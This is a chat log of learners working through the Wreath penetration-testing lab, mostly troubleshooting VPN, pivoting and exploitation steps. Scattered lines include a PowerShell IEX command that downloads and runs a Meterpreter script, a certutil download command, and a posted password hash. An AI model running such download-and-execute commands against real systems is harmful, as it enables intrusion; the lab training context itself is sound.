#wreath-network

Yeah, I don't think I've ever seen someone do that in practice

ok. interesting to know tho

It was just to demonstrate that an initialised string does basically the same thing

Yep. Python is an interesting language. It has a lot of funny quirks in it

Thank you for all the info. Now to see why netcat isnt picking up the shell lol

Gave +1 Rep to @merry robin

You are most welcome 🙂

"foo" in python returns the string of the literal, which is successful, even if not saved.

I would like to think that it's optimised out, buuuuuuuuuut

I just bragged in general, so I will be smaller here.

@zinc oriole do Holo

ok

@merry robin Please have a look🙂

hello guys, im facing a problem. im trying to ping the machine but i can't, even though i am connect to the network. I go in the access tab it says i am connected to the wreath network, and Network State is running, but i can not ping the machine.

Docstrings are funky

any help ?

When did you download your VPN config file?

Well , windows will drop the ICMP ping requests . So it will not respond to ping . Try nmap scan

i just downloaded the config file and try. same issue

me and the machine we all using linux.
i face same issue with nmap.

is the network up and running just for confo

yes it is

if i am not wrong ur tring to ping prod-serv right

yes

well then this is something big ig.

can u send the screen shot of the ping request , like is it saying host unreachble??

can u?

https://prnt.sc/1g4z19p

sometimes it says host unreachable

@fathom vine i could suggest u rejoning the room as ur in the dev network read the convo from here

it drooped me again into 10.200.72.200

read this ig this is the case with u wait until Muiri arrive he may have a solution for u

i wish @merry robin arrive asap. thank you very much for your help, i appropriate it.

Gave +1 Rep to @mild kelp

you might try leaving the room and rejoining and redownloading the ovpn file

I think I'm going to skip holo for a bit... I don't really want a windows vm on my network right now

Hi guys! I'm at Task 21 Git Server Stabilisation & Post Exploitation. Can't RDP to Git Server neither with Remmina, nor with xfreerdp. It says that Can't connect... WinRM connection works btw.. The remote user and the Remote Management Users group are sorted.. Any suggestion???

Can you please provide the output of net users and net localgroup "Remote Desktop Users"?

In the room, it is Remote Management Users🤔
One can try both🤔

Edit
I don't remember, if we can solve using any one. Anyhow, one should try both🙂

I'm listed as a member in both...

Remote Desktop Users is for RDP, Remote Management Users is for WinRM

I can see the issue now, I have to add myself as a Remote Desktop User also...

👍

I can finally access final Machine, all hail reset!

Task 11
no-agent-forwarding,no-x11-forwarding,no-pty tried these with my public key in authorized_keys file but im still able to get login using the ssh from the other machine

Never mind. I just figured it out

I had this doubt since from the beginning that, why are we copying our own public key into authorized keys, Now I understood that, People who has Our Private Key cant get a shell on Our machine due to these no-agent-forwarding,no-x11-forwarding,no-pty Restrictions. I initially tried logging in with password from another local machine which apparently worked cuz im not using the Private key.

i just wanted to confirm this but a port forward helps us access a port on a target machine through a compromised machine on the network and a proxy helps us run almost any command on the target machine through the compromised machine but the tradeoff is speed right?

Kinda
There isn't really a huge speed difference between the techniques a lot of the time -- not a noticeably anyway. Port forwards are usually quicker than anything involving proxychains though, so, yes. The speed disadvantage is when you try to route a lot of traffic through a proxy (e.g. with Nmap).
A port forward makes a connection (almost like a tunnel) between two ports specifically -- one on your machine, one on the target. A proxy is more general -- it opens up access to everything that the compromised machine can access.

The big tradeoff is how much messing around is involved. Port forwards are clean and simple -- proxies involve a bit more work.

Ok thanks for clearing it up

Task 14
Forward socks Proxy isnt working, Am I doing anything Wrong??

Ehhhhhh that depends on the type of proxy

I can set up a proxy off a Linux box in about 10 seconds

Okay Mr Pedantic. Smh.
The hacky proxies that we normally use in compromised environments are often a pain in the arse.

A proper proxy is fine. Sshuttle is fine

I need to see about getting some help with the Wreath room. I am on the pivoting part with the traffic forward and using the sshuttle command I am getting a permission denied (publickey,gssapi-keyex,gssapi-with-mic). I have verified my id_rsa looks right. It is the same token I used to ssh yesterday. I have seen in the googles where people are talking about updating the sshd config file on the server. I don't want to break the server for others.

OMG........ I did not have the line breaks in my cert. I had made the cert all one line when copying it.

Hey!! I'm currently logged into the Git server with WinRM and I'm trying to run mimikatz from there

But the mimikatz doesn't seem to work!!

I transferred the mimikatz using Powershell!! And I'm not using the RDP

Is there any kind of extra options that's needs to be passed for mimikatz to work with evil-winrm?

It won't work in WinRM @marble oasis -- hence why you were instructed to use it in RDP

my vpn connection is ok.. but the ip is not reachable what to do

Your virtual IP is 10.50.161.24
And the wreath network in within the subnet 10.200.164.0/24

You are on a different subnet, try re-joining the room after leaving it.
And or try regenerating your VPN configuration file

Edit: fixed an incorrect octet in IP
Using openvpn, there are ip routes added to access the connected machines.

You need to be within the same subnet in order to access the connected networks.

Wait, what?
The VPN never allocates IPs inside the training subnets. The VPN IP there is 10.50.161.24, which is a normal Network user IP.

i am retrying all.. i just connected then compromised the 1st machine waited for some time .. when i came back.. i am facing the problem

same problem tried to regen the vpn and rejoin the room

here you saying something wrong with the ip but using this ip i have compromised the 1st machine

so what i can do here

hay , i dont know whats going on.. i rejoined and reconfigured but nothing changes .. even the vpn is also same also the room and my progress is also no reset

Sorry, I forgot about the ip routes 😅
openvpn adds these for you to connect to the networks made accessible via the configuration file.

i mean how can i fix this

Please wait for Muiri, I think he found something wrong.

I can't do anything about network issues I'm afraid -- I don't have access to the AWS side of things.
@fair breach might be able to help debug though 🙂

ok thanks..

Gave +1 Rep to @merry robin

is this only from my side or it's everyone

No idea -- I can't see whether there's anyone else connected to 164

this is from my friends side.. is this ok.. can i go with this

so in wreath, when setting an ip for the reverse shell do i use the 10.200.x.x ip or the 10.50.x.x ip?

You need to use your IP address, see https://tryhackme.com/access
Change the network to Wreath and then you will see your virtual IP address that you can use for reverse shells

It should be 10.50.x.x

gotcha thnx

and would you be able to help me stabalize the shell? i know its not needed but its bothering me bc it screws up my terminal everytime and reset doesnt work lol

Umm

U can try rlwrap

Or socat

There should be some information about this in the room itself.

i should

Theres a room called, what a shell

It have tips and all

ill try rlwrap

yeah thats what im going off of

i keep messing up bringing in a bash shell using python

break my terminal everytime

There is a tool named pwncat.
You can try it, see https://github.com/calebstewart/pwncat

Make sure to do tasks manually as well😋

I am a beginner, you may DM me if you need any help from me. I will try to help.
Have fun with this room👍

I will try and thnx for the invite

@merry robin Thanks you for the room! I really enjoyed myself, lots of tools I don't usually get to play around with. I noticed two things while working through the Tasks

1. Spelling mistake in Task 22 Command and Control Introduction (Probably more but this is the one I noticed): ...As such, there are actually two public versions of Empire -- the original (now very outdated), and the current BC-Sercurity fork. Be careful to get the right one! There is an r too much in BC-Security
2. There is an issue with Win-Kex (Kali under WSL2) and sshutle starting in Task 15. It was mentioned a couple times in here, but I couldn't find a quick fix. So here it is (behind a spoiler tag in-case someone wants to dig on their own): ||Calling update-alternatives --set iptables /usr/sbin/iptables-legacy fixed the error for me see here: https://wiki.debian.org/nftables#Reverting_to_legacy_xtables||

Gave +1 Rep to @merry robin

Good catch on the typo, thanks!

Hey all. For some reason I am not able to connect to the first server. I have left the room and rejoined, I have redone my vpn file and reconnected.
ping 10.200.159.200
PING 10.200.159.200 (10.200.159.200) 56(84) bytes of data.
From 10.50.156.1 icmp_seq=1 Destination Host Unreachable
From 10.50.156.1 icmp_seq=2 Destination Host Unreachable
From 10.50.156.1 icmp_seq=3 Destination Host Unreachable
From 10.50.156.1 icmp_seq=4 Destination Host Unreachable
From 10.50.156.1 icmp_seq=5 Destination Host Unreachable
From 10.50.156.1 icmp_seq=6 Destination Host Unreachable
From 10.50.156.1 icmp_seq=7 Destination Host Unreachable

I can hit 10.200.159.250

Please can whoever made changes on the .200 undo them?

I need some help with Wreath, it says that is running but i got no response from ping or trying to get into the webserver that it has available it was working fine these 3 days i've been in the machine but now idk.

Same issue...

reset the network

Hello. I have the WreathNetwork on "My Rooms" and I especially remember the 7day streak I did for that.
But when I go to the Access page, it says that I don't have access to any networks.
I don't see any JoinRoom button and I am able to answer questions(in ability).

I also reset the progress on it but still can't get an openVPN file for download.

should i leave the room and rejoin?

will it require another 7 day streak? 😒

Okay so issue resolved: Leave the room and rejoin worked.
Classic OFF and ON.
XD

Are ya now

Hi guys, I wonder what is this , I have been trying to connect to Wreath.

On wreath network says i do not have access to networks

i am a monthy subscriber

Sorted thank you.

Hi task 33, bonus question. I'm not really experienced with C#, I've visited the github link but seem not to understand what I need to do to write clean service with my payload embedded in it. Managed to escalate with different code but the error is still present when starting the service. Any tips on how do I do it, or should I skip it over since I don't know C#?

It looks like the connection to the 150 and 100 machines is not working from the 200. Is anyone else seeing this?

When in the machine, cat /etc/shadow outputs the hashes of the users. Then I went to go copy the root hash and it is wrong. the hash I'm seeing is "$6$B6O5HFsVwU7Kaak3$6T//VQ/1oEb4AAydrH6TI.jBhGPfy56nIM7uUXhUoNoX5RtTsoaKKbnaUE5wFuNVvL70oe8tY.ScVSf5N7aYK."

refresh the page and try resubmitting it.

it's also possible a user changed the password

Hi

I think you should mark this like spoiler

||Like this||

The exploit 43777.py doesn't seem to work on git-serv. I've exploited once before but the network got reset and now I'm redoing some of the steps and I'm stuck on this. I just changed the IP and the file name of exploit.php, as well as the shebang and ran dos2unix. Is it just me getting stuck here?

OK I figured it out. I had to change exploit.php in 2 places

I can't seem to get my exploit running, any tips would be really helpful ❤️

python -m pip install requests
Requirement already satisfied: requests in /home/elliamy/anaconda3/lib/python3.8/site-packages (2.24.0)
Requirement already satisfied: certifi>=2017.4.17 in /home/elliamy/anaconda3/lib/python3.8/site-packages (from requests) (2020.6.20)
Requirement already satisfied: chardet<4,>=3.0.2 in /home/elliamy/anaconda3/lib/python3.8/site-packages (from requests) (3.0.4)
Requirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /home/elliamy/anaconda3/lib/python3.8/site-packages (from requests) (1.25.11)
Requirement already satisfied: idna<3,>=2.5 in /home/elliamy/anaconda3/lib/python3.8/site-packages (from requests) (2.10)


(base) elliamy@ElliPC:~/Documents/Wreath/Tools$ python2 43777.py 
Traceback (most recent call last):
  File "43777.py", line 17, in <module>
    import requests
ImportError: No module named requests

Maybe try python or python 3

It has to be python 2 :p

running it with the other 2 gives the same error btw

besides python3 which gives a syntax error as it's python2

Oh....... Weird

the problem was pip was only letting me use the python3 directory, so I just had to move the files to the poython 2.7 directory

python*

still getting stuck on 'get user list' tho

It's so frustrating

if anyone know show to fix this, I would be really, really grateful. Feeling defeated

[+] Get user list

Traceback (most recent call last):
  File "43777.py", line 47, in <module>
    r = requests.post("http://{}/rest/user/".format(ip), data={'username' : username, 'password' : password})
  File "/usr/lib/python2.7/dist-packages/requests/api.py", line 119, in post
    return request('post', url, data=data, json=json, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/api.py", line 61, in request
    return session.request(method=method, url=url, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 542, in request
    resp = self.send(prep, **send_kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/sessions.py", line 655, in send
    r = adapter.send(request, **kwargs)
  File "/usr/lib/python2.7/dist-packages/requests/adapters.py", line 516, in send
    raise ConnectionError(e, request=request)
requests.exceptions.ConnectionError: HTTPConnectionPool(host='10.200.187.150', port=80): Max retries exceeded with url: /rest/user/ (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f2eacd26c50>: Failed to establish a new connection: [Errno 110] Connection timed out',))

I got the sshuttle going, so that aint it

actually, the website is down, maybe someone accidentally brought it offline?

Hello, what website are you talking about?

the gitstack one

lemme check

it's ok, I just worked it out

nice

I had a small typo in my sshuttle

mis typed a digit

😄 happenes

been pulling my hair out for ages 😄

🙂

is the network down?

can anyone add some reset votes? Kinda took the machines offline by mistake

aight im on task 35 and im in the evil-winrm and try to download the website.git dir but it does nothing. just says downloading website.git and instantly syas it was successful but i dont have it on my machine

ok i fixedd it by copying it to the documents folder

ty for help guys ❤️

this happened yesterday why does wreath just die sometimes

You know the networks sleep if you don't extend them, right?
Otherwise, it's often people being dicks and turning off .200 manually

I thought it had like 3 hours left or something 😭

Wat is it possible to extend time upto 3 hrs I didn't know that.

yeah, I kinda took the network off by mistake, had a typo on my command and it just crapped itself

only 1 more vote to reset it tho

I put chisel on git-serv but running ./chisel-myname -h gives no output and I can't seem to get it to forward traffic. Any idea what I may be doing wrong?

I definitely uploaded the Windows chisel provided by the room using evil-winrm

I'm stuck on task 34 due to chisel not working

Do I need to do Window's equivalent of chmod +x?

Kinda @hollow jackal. Make sure it has a .exe extension

ok that works. thanks

forgot Windows requires extensions

I don't really like having to turn Foxy Proxy on and off going between normal pages and proxied pages. Does anyone know a way to get proxying for just a some URLs on firefox?

Yep, in the settings you can configure a regex/mask to only proxy (for example) 10.0.0.0/8

I think that'd be 10.*.*.* or something, not sure how mine is set up

Someone renamed the website.git dir to website1.git

I seem to be enable to download website.git with evil-winrm's download. I've tried both download website.git and downloading the compressed zip of it but the files are nowhere to be found in the directory I started evil-winrm in. Any idea what's wrong?

It doesn't even take a minute or 2 to download, it just said it's a success

I've tried full/relative paths, back & forward slashes, but nothing seems to work and evil-winrm just says "download successful" but nothing appeared on my machine

Aside from WinRM and RDP (I know I can mount with RDP but hate the speed), how can I upload to and download from a windows machine? Is there an easy mount command?

you can use smbclient

if you have the correct privileges, you can connect to the C$ share

I have evil-winrm as Administrator. How can I check SMB from the victim machine?

there's 3 shares that will always be on the machine, C$, ADMIN$ and IPC$

if you use smbclient //ip/C$ -U 'DOMAIN/USER'
you'll get dropped into a cli-like file browser

The dir website.git got renamed to website1.git but the web server is still running. Should I rename it back to website.git?

It's a sandbox -- go for it 🙂

Worst thing that can happen is it breaks even more -- in which case you just reset it

If it's already broken, and it's in an environment that ultimately doesn't matter, just go for it and see what happens 😁

you can install a c2 client 🙂

you can use curl

Even Meterpreter would do 🤷‍♂️

there's nearly unlimited ways

^^^^

Right. Way past bed time

May or may not have just deprecated a server at 4AM, half drunk, and my God do I need to sleep off the stress

I think in the room it explans you setting up a smb server on your local via python

It does indeed 🙂
Later on though

you can use certutil

like certutil.exe -urlcache -split -f http://10.200.145.200:15881/chisel_1.7.6_windows_amd64 chisel.exe

echo IEX(New-Object Net.WebClient).DownloadString('http://10.200.145.200:8081/meterpreter-64.ps1') | powershell -noprofile

to grab a file with ps

I intend to go back and try a bunch of things like that once I've finished the room

I think I took a whole extra day playing with chisel, and another with empire

I'm trying to do PtH with Administrator's hash using cme, psexec and smbclient but they're all timing out. Is this behavior expected on this box?

I have sshuttle running for x.x.x.* and chisel forwarding to the personal PC

I'm trying to exfiltrate stuff by hosting and SMB server with smbserver.py -ip tun0-ip sharename sharedir but running net view \\my-ip errors with no result. What am I doing wrong?

I managed to get evil-winrm to download. I had to run it as root, download with the full path, and the download lands in /usr/share/evil-winrm rather than the dir I ran it in.

Does anyone know some markdown/latex template I can use for writing the report? I prefer using plaintext docs with something like pandoc.

I've only found 1 nice template (https://github.com/robingoth/pentest-report-template) but more would be nice for reference

Are there some vulns not covered in the room I can try and learn about?

Hello, I am having trouble with the hash from task 6? I know I have the root hash but when I copy and paste it over to THM for submission, it keeps returning "incorrect"

Someone probably changed the password.

thats cool

how can i get the correct hash then?

reset the network

refresh the page and make sure you haven't triggered rate limiting first

Okay thank you

How should mimikatz hash dumping be reported? Should I include it as a vuln? If yes, what CVSS score should it be?

What CVSS score is "running web service as root"?

Be aware that this is personal opinion and if asking different people you gonna get some different answers.
imo Dumping stuff with mimikatz is bad, but not the real issue. It's just one of the ways you can abuse creds being stored and not correctly protected, if you have enough access to run mimikatz you can usually also just straight up dump SAM/SECURITY from the registry or dump LSASS. SANS has a blog which goes into detail about what to do against those attacks: https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks/24612/ If you want to assign a CVSS score I would place that somewhere around 7.3 (CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N) - 8.1 (CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N) depending on how much you had to work to get around the protections to be able to run mimikatz

same with running web server as root, it's usually not a good idea, but not the actual isssue. If you want to mention it there is something called Common Weakness Enumeration, which has a category for it: https://cwe.mitre.org/data/definitions/250.html

The issue is the stuff you actually managed to exploit on the server, which was then amplified by the fact that the server was running as root, which means that Confidentiality, Integrity should be HIGH instead of LOW because you got access as root and not as www-data

If I understand you correctly, I should simply report the known CVE together with "running as root" as a single higher severity, instead of reporting them individually with their own lower severities.

CWE is very helpful in categorizing vulns

Given a CVE, should I report it as "CVE-xxxx-xxxx" or its actual vuln like "RCE"?

If you find something that has a CVE I would add that to the vuln, something like CVE-2012-2311: Apache cgi-bin Remote Code Execution maybe?

also, If you keep finding CVEs on a real test, it points to a larger problem the customer has: Patch management, because these vulnerabilities are actually known and you should have patched your systems.

hey!! The SANS page is showing 503

hu... that's odd. Google has a cached version: https://webcache.googleusercontent.com/search?q=cache:tAjVRxFEU0EJ:https://isc.sans.edu/forums/diary/Mitigations%2Bagainst%2BMimikatz%2BStyle%2BAttacks/24612/+&cd=1&hl=en&ct=clnk&gl=de&client=firefox-b-d

how many points do you get from wreath?

are the points the equivalent of a really long walkthrough?

616

Huh. That was actually right

That's the number of the beast...

Isn't that 666?

It's both

greedy thing has two phone lines

668. The neighbor of the best

667 - The Nearest-Neighbour of the beast

665 the closest guess to the best without going over

Its telling my hash wrong any way to fix ?

Hello I am trying to complete wreath Task6

And it won't accept my answer if I could dm anyone I would really appreciate it! 😀

if the network resets are all the things the same or i have to redo all the previous tasks?

If the network is in sleep, that is it automatically stopped after the available time was over and no one extended the time.
Then all of your work should stay unchanged, unless someone tampers it or the network is actually reset
I hope this is correct, I completed this wonderful room under 8-10 hours😋

And obviously, you will have to setup all of the connections again. That is straightforward🙂

Hey!! I'm having some trouble with Chisel!! I opened a forward proxy in the git server and connected via my attacker's chisel client!! Then used froxyproxy but my client reports i/o timeout (even after 10th attempt)

And yes, I've opened the port in Git-Server's firewall

Somebody help please?

Hey, I was just learning how one can stabilize a reverse shell, and these are the methods that I learnt

get a reverse shell as always: nc -nvlp 8080
press CTRL+Z
stty raw -echo
fg
reset

How ever, at the point of entering reset, I cant press enter, it just stucks there and I cant do anything. While I press return key, it displays ^M instead of return itself, I've provided a video

└─$ echo $TERM
xterm-256color

└─$ echo $SHELL
/usr/bin/zsh

You're in zsh so you need to combine the stty raw -echo and fg into stty raw -echo; fg

Hey thank so much mahn, I couldn't find any solutions online 🤗

I got another problem now 😅 , wtf is this happening 👇

Gave +1 Rep to @strange bison

This happens when I press enter after a command

Run reset command to reset the terminal.

This will re-initialize the terminal. It is used to fix abnormal state of the terminal console.👍

Looks like a possible
line
break
issue😂

Thanks but it doesn't fix the issue, it's still the line break issue

Gave +1 Rep to @lusty saffron

Please let me know if you find any solution to this, it might be helpful😄

wraith is one of the best network to do and the explanations are on point

Agreed, but please don't patch the starting point

sometimes the port 1000 gets closed

It might be a different port, ||10000||

I'll see about making it harder to mess with if I get a second at some point. That bit is on a fricken' init.d script though, if memory serves.

The RCE automatically connects to the port, I don't think there is a manual override

Cheers Muir, very much appreciated! 🙂

It is actually the port ||10000, Webmin 1.890, backdoored package||

There should be a manual override in my script for it?
I went... very over the top with that one

Ahhh

right I'll have to review the code again

if there is a flag that allows for port specification I'll have to sus it out

There is indeed. The script properly takes the required arguments.
The flag is -p/--port

Ahaha, you know my script better than I do. Thank you 😄

The more you know

Thanks for the share @lusty saffron, absolute pog! 😃

Gave +1 Rep to @lusty saffron

hey guys, found nothing in the history so here it goes. Trying to run the WebMin 1.890 exploit from task 6. Tried the one from the room, metasploit and a couple of other python scripts from google but none worked. Every exploit told me the target is vulnerable but no commands got executed, nor did i get a rev shell. I triple checked every ip, tried different ports on my machine and tried all that on two VMs on two different host laptops 😄
Anyone got an Idea why that happens? am i missing something

I can't remember if I put a firewall on that machine, but the fact I explicitly said "Try choosing a well-known port such as 443 or 53" would indicate that I probably did

tried 443, 53, 8080, 80 and the standard funny ones like 1337 6666 and so on 😄

Having said which, that error is interesting. It clearly manages to execute its nonce check or it wouldn't get to that stage

I suspect someone has messed with that box. Try going for a reset

That were my 2 guesses. Either i oversee some ultra stupid mistake i made or something messed up. We were at 2/8 reset requests when i wrote this, so i thought maybe i'll find another solution until then 😄 7/8 right now, so now I'm waiting. Thanks anyway for the fast replies!

reset of the network did the trick

SHELL=/bin/bash script -q /dev/null try this

Hello

Wreath is not working 😦

Gonna have to be a little more specific than that :)

Hii

I have problem connecting to wreath

I mean I can connect to the network

But after that nothing is responding or working

Having this problem since last night

Do you mean that you are not able to ping and/or connect to the first machine?
If that is the case, try leaving and re-joining the room, it won't affect your access (7 day streak requirement).
And try to re-generate your VPN pack

Thanks that worked

i want to url encode the reverse shell code but i am getting an error.what am i doing wrong?

You are trying to make a POST request, but aren't you missing the parameter name here?
It should be a=... not a+...

And to urlencode the data try urllib in python

from urllib import parse
payload = """your data comes here"""
print(parse.quote(payload))

Or you may try any tool available online

You may want to write a script to send the payload (commands), to do the same process you are trying to do using curl.
That way, it will be easier to save your results for the report

this will be my first time trying to make a report so i just wrote what i found with enumeration and what exploit worked or which ports were open etc.i didnt really screenshot the stuff etc

a few minutes ago i could connect to it but now i cant

nvm i restarted the server and it works

Don't worry. I personally take multiple screenshots including the context where possible😆

Just wanted to confirm this but I am using virtualbox for kali. I am supposed to install docker for the command and control section right?

You don't need to, no

The installation instructions in the task say to just use apt

but the note in the introduction says i might have problems while using virtualbox

No, you might have problems while using the AttackBox

i read that wrong ;-; i thought it was virtualbox 🤦‍♂️

I think I broke wreath, I managed to get an initial shell and I accidentally closed the terminal. When I try re-run the exploit I get this

sorry If I messed it up, I'm unsure of what to do now.

@untold hazel As much as I appreciate the DM, it would be better in here as others might benefit also.

Shouldn't it be https://MACHINE_IP:10000/ (HTTPS)
What say Muiri?

There is an exploit in metasploit framework as well, open up msfconsole and search for it - search webmin👍

You're encouraged to avoid the msf version

It just gives you the version that you tried to use 🤷‍♂️
The exploit was deployed against the IP address -- it defaults to HTTP, so http:// is in the error message

Alright😅
IIRC, there was SSL handshake when I used your script.

when I visit the web url you mention I get this, I tried the exploit again just now but still get connection refused. I think a box reset will fix the issue, just got to wait for enough votes for reset...

Is it because of the domain name?
MACHINE_IP => thomaswreath.thm?
It might be visible from the nmap scan. I gotta take a look at my report first😆

I have 10.200.193.200 add'd to my hosts file already

The exploit worked first time but for some silly reason I closed the terminal, noobie error.

Alright, I forgot that you were successful in the first attempt.
So this is ruled out anyway😅
I am not sure why would closing the terminal or your session would interrupt Webmin service.
Please tag me if you figure out the issue🙂

I think the initial exploit worked and me closing it has cause an issue, I'll let you know, thanks for trying to assist.

When I try to pivot to .150 host with sshuttle, I get the following error. Can anyone help?

# Warning: iptables-legacy tables present, use iptables-legacy to see them
fw: iptables -t nat -N sshuttle-12300
fw: iptables -t nat -F sshuttle-12300
fw: iptables -t nat -I OUTPUT 1 -j sshuttle-12300
iptables v1.8.7 (nf_tables):  CHAIN_ADD failed (No such file or directory): chain OUTPUT
fw: undoing changes.
# Warning: iptables-legacy tables present, use iptables-legacy to see them
fw: iptables -t nat -D OUTPUT -j sshuttle-12300
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'OUTPUT', '-j', 'sshuttle-12300'] returned 1
fw: iptables -t nat -D PREROUTING -j sshuttle-12300
iptables: Bad rule (does a matching rule exist in that chain?).
fw: fw: error: fw: ['iptables', '-t', 'nat', '-D', 'PREROUTING', '-j', 'sshuttle-12300'] returned 1
fw: iptables -t nat -F sshuttle-12300
fw: iptables -t nat -X sshuttle-12300
fw: fatal: fw: ['iptables', '-t', 'nat', '-I', 'OUTPUT', '1', '-j', 'sshuttle-12300'] returned 4
c : fatal: cleanup: ['/usr/bin/sudo', '-p', '[local sudo] Password: ', '/usr/bin/env', 'PYTHONPATH=/usr/lib/python3/dist-packages', '/usr/bin/python3', '/usr/bin/sshuttle', '-v', '--method', 'auto', '--firewall'] returned 99

This is the command I used!
sshuttle -r root@10.200.55.200 --ssh-cmd "ssh -i id_rsa" 10.200.55.0/24 -x 10.200.55.200

Seems like this is an error from your system, maybe you need to see if there is an entry already present there as shown in thestderr. Perhaps because you ran sshuttle before and it was killed/terminated abruptly.
Check sudo iptables --list, it might show something.

Are you using WSL2?

hi , can ask the question , room wreath have problem which cannot see button start machine ? under repair ? or just me have problem ?

have you joined the room?
Did you try adjusting your screen zoom?

yup have join this room , it same while i change screen zoom

Yes. Is that the problem?

Yes

what is the issue?

@stoic flicker did you get WSL2 working with sshuttle in the end?

Nope.

It doesn't support the routing and network features that SSHuttle requires.

I asked someone else for a reason

Nope

iptable is empty.

# Warning: iptables-legacy tables present, use iptables-legacy to see them
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Used proxychains instead

It does not work with WSL2...

So you did a ssh proxy?

Yeah it's got a weird network stack

IKR

I think wsl1 was easier

Iirc, proxychains using socat as the socks

Ssh proxy should also work

Using -D

Ah ok. I was thinking that since I have ssh already I will do something like ssh -D 1080 root@10.200.x.200 -i id_rsa

yeah

will try that then

Should work

Try it

thanks for the help mate

I'll check the issues on Github once I get home

I haven't used WSL/WSL2 much, thanks for letting me know about this🙂

hi

anyone here?

????

Please ask or tell what you have to share🙂

@lusty saffron i have problem connecting to wreath network

i have got the inital access and in the middle of tasks

now i am unable to connect to network showing no route to host or unable to ping the first machine

Is your openvpn client running correctly?

yep it connected correctly and i there are routes to wreath network

Alright, looks like the network went to sleep.
Did you check whether the network is running or not?

If not, you should then Start it.
Your changes will still be present there after the network starts again

the problem is its running @lusty saffron

but iam unable to connect

There should be 3 options (red, yellow, blue) below the network connection diagram on the room page.

Are you sure the network is running?
Try refreshing the page, it might have stopped.

iam 100% sure its running

Well then, I can't help😅

i think some one has knock out me from network or something

whom i can contact for help

As you said, you got some issues in the middle of tasks.
This suggests that the network has went to sleep.
I can't think of any other issue, given your details.

Someone will surely help you, give it some time.

@lusty saffron if network goes to sleep , there is no start options highlighted or network is showing running

how to shout out the thm support team?

Try Ctrl + F5 or Ctrl + Shift + R to hard refresh

There should not be any urgency for that, Muiri may help you

@lusty saffron still same result

Try leaving and re-joining the room

It shouldn't reset your progress🤔

still same i even download the new wreath network vpn and connected again

after leaving and joining the room

@merry robin can you please help?

Also, verify yourself first. You may be required to share some screenshots.

how to send screenshots

!docs verify

iam unable to upload here

You gotta verify yourself first

@lusty saffron thanks i verified and here is screenshot

Gave +1 Rep to @lusty saffron

Great, and what does the ping command output?

ping shows unreachable

$ ping 10.200.121.200
PING 10.200.121.200 (10.200.121.200) 56(84) bytes of data.
From 10.50.118.1 icmp_seq=1 Destination Host Unreachable
From 10.50.118.1 icmp_seq=2 Destination Host Unreachable
From 10.50.118.1 icmp_seq=3 Destination Host Unreachable
From 10.50.118.1 icmp_seq=4 Destination Host Unreachable
From 10.50.118.1 icmp_seq=5 Destination Host Unreachable

i did all the necessary steps before asking here @lusty saffron

No issues, someone will help you soon👍

@lusty saffron waiting

You don't need to tag me😆
I can't help with this

Could you also provide your openvpn output?
Put the output in between ```here```

2021-08-26 10:07:32 OPTIONS IMPORT: --ifconfig/up options modified
2021-08-26 10:07:32 OPTIONS IMPORT: route options modified
2021-08-26 10:07:32 OPTIONS IMPORT: route-related options modified
2021-08-26 10:07:32 OPTIONS IMPORT: peer-id set
2021-08-26 10:07:32 OPTIONS IMPORT: adjusting link_mtu to 1624
2021-08-26 10:07:32 Using peer cipher 'AES-256-CBC'
2021-08-26 10:07:32 Outgoing Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2021-08-26 10:07:32 Outgoing Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2021-08-26 10:07:32 Incoming Data Channel: Cipher 'AES-256-CBC' initialized with 256 bit key
2021-08-26 10:07:32 Incoming Data Channel: Using 512 bit message hash 'SHA512' for HMAC authentication
2021-08-26 10:07:32 net_route_v4_best_gw query: dst 0.0.0.0
2021-08-26 10:07:32 net_route_v4_best_gw result: via <redacted> dev eth0
2021-08-26 10:07:32 ROUTE_GATEWAY <redacted> IFACE=eth0 HWADDR=00:0c:29:0a:d0:be
2021-08-26 10:07:32 TUN/TAP device tun0 opened
2021-08-26 10:07:32 net_iface_mtu_set: mtu 1500 for tun0
2021-08-26 10:07:32 net_iface_up: set tun0 up
2021-08-26 10:07:32 net_addr_v4_add: <redacted> dev tun0
2021-08-26 10:07:32 net_route_v4_add: 10.200.121.0/24 via <redacted> dev [NULL] table 0 metric 1000
2021-08-26 10:07:32 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
2021-08-26 10:07:32 Initialization Sequence Completed

$ ssh -i id_rsa root@10.200.121.200
ssh: connect to host 10.200.121.200 port 22: No route to host

Maybe a bit late but redownload the vpn pack?

I am doing wreath and am quite confused about reverse shell, port forwarding and tunneling. They all look similar to me.
Anyone can Explain in brief? Or any blog or something to read about it?

anyone having a hard time pinging the machine?

what are you having a hard time with?

when I ping the IP of the initial machine it wont response back, I'm almost done with the wreath machine.

oh sorry saw pinging

You are almost done all the tasks?

yeah, I'm on the task 41 currently.

ok sorry then friend, Im not that far ahead

can't continue the task, I guess there is an issue on the machine. I can't ping the .200 as well.

did the network timeout on you?

not sure but it shows when I ping that destination host unreachable. weird

could be the wreath network timeout....just a guess, refresh the main wreath page and see if its offline

not sure what's happening. will try to configure my VM network.

good luck

I'm coming back to finish this and my ovpn isn't working anymore. I don't have the option in the access networks page to regenerate it, only holo. How can I regenerate my ovpn for this?

only 1 network ovpn i guess

can someone help reset wreath?

i am getting this while trying to forward proxy and accessing the webserver on the personal pc.what am i doing wrong?

also when i search 127.0.0.1:4444(my listening port) it keeps on loading and doesnt give me a result

meaning i probably didnt make the connection properly

any idea what i may have done wrong?

i am not getting any thing saying the server is running or something when i run this command too btw

i fixed the port from 17000 to 16000 but still same result

Hi Tech , iam subscribed users and streak required above 7 , but in my side acc dont show button start and image plan network

Sounds like you haven't joined the room?

ever join . another day, i want continue this room but it problem like this , it no display , so i try reset progress but it same problem

